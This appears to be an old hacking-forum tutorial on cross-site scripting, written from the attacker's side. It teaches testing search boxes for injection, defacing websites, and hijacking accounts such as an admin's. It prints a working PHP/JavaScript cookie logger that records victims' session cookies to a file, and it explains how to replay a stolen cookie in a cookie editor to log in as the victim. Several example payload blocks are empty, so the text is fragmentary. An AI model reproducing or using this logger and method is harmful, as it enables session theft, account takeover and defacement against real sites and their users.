XSS - Cross Site Scripting.

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it.

What is XSS, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

What types of XSS are there?

There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

What will you be teaching today?

The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.
Code:

We now see a pop up message on our screen saying "XSS". This is what it should look like: http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

Code:
">

Okay, we have found out that it is vulnerable. We can now move on.

How can I deface a webpage with XSS?

I will be showing you methods for persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:
Code:

Remember, you can always alter the code if it doesn't work.
You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger.

Make two files:
Cookiemonster.php
Cookies.txt

Cookiemonster.php:

Code:
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./cookies.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '';
document.write(html);

< ?php
}
?>

Then just leave cookies.txt blank. But make sure you made the file.

How do I send my cookie logger to my slave?


Code:

What does a cookie look like?
Once you have received their cookie it should end with "PHPSESSID=52ce8e4a74936673js24500be1919004"
The cookie is the string after "PHPSESSID="
There are different forms of cookies. If you have your cookie logger setup correctly it won't matter, just copy and paste it all into your cookie editor.

What can I do with someone else's cookie?

Once you have someone else's cookie you can use a cookie editor, (search for one on Google) go to the victims website, change your cookie to their's and you should be logged in as the user they are. Example; if your target is "admin" and "admin" has logged into the site, you send him your cookie logger and steal his cookie, you then change your cookie to the admin's cookie, and you will then have access to the website and do as you wish.

Using other programming languages for XSS.

It's simple, to test if it's vulnerable try this.
Code:
XSS

If the text says XSS in red, then it's vulnerable to HTML injection as well. Just inject other languages in, and you will be able to do much more.

I hope this helps. Happy hacking.